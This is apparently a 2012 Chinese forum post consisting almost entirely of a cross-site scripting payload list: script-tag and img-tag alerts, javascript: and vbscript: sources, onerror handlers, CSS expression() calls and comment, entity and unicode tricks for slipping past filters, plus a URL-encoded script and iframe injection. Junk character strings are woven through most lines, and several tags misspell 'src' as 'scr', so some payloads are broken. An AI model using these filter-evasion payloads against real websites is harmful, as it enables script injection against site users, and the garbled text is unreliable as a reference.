<script>alert("跨站")</script> (最常用): }. j F( a l) U' [: |' O! C
<img scr=javascript:alert("跨站")></img>
9 u4 `: u9 o4 D<img scr="javascript: alert(/跨站/)></img>9 U. H- \7 W5 \3 Z
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ W: b" S; F: `$ m<img scr="#" onerror=alert(/跨站/)></img>
' V6 V; k. t# R$ t2 C; w<img scr="#" style="xss:expression(alert(/xss/));"></img>9 a0 q3 o! X2 [5 \6 {% `
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释) Z6 ^+ V+ ^' a8 v1 }: k% L* t
<img src=vbscript:msgbox ("xss")></img>" i) P+ _# i+ V0 a# N* S) D% W
<style> input {left:expression (alert('xss'))}</style>4 T; B+ ~# Z9 P
<div style={left:expression (alert('xss'))}></div>% M- W5 O% W8 q; s+ F$ ?& o. Z
<div style={left:exp/* */ression (alert('xss'))}></div>* m/ ~+ ~. V* K) a
<div style={left:\0065\0078ression (alert('xss'))}></div>5 F, }+ i+ P1 J+ K1 }" g4 c
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
: w% F# S- I# }8 funicode <div style="{left:expRessioN (alert('xss'))}">
; m. J% e+ G' h
' I) j, z6 ]( P/ o# m/ @4 a4 g' c"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
9 k2 \, e; U$ [. ^7 b% o |
发表于 2012-9-15 14:09:13
收藏
支持
反对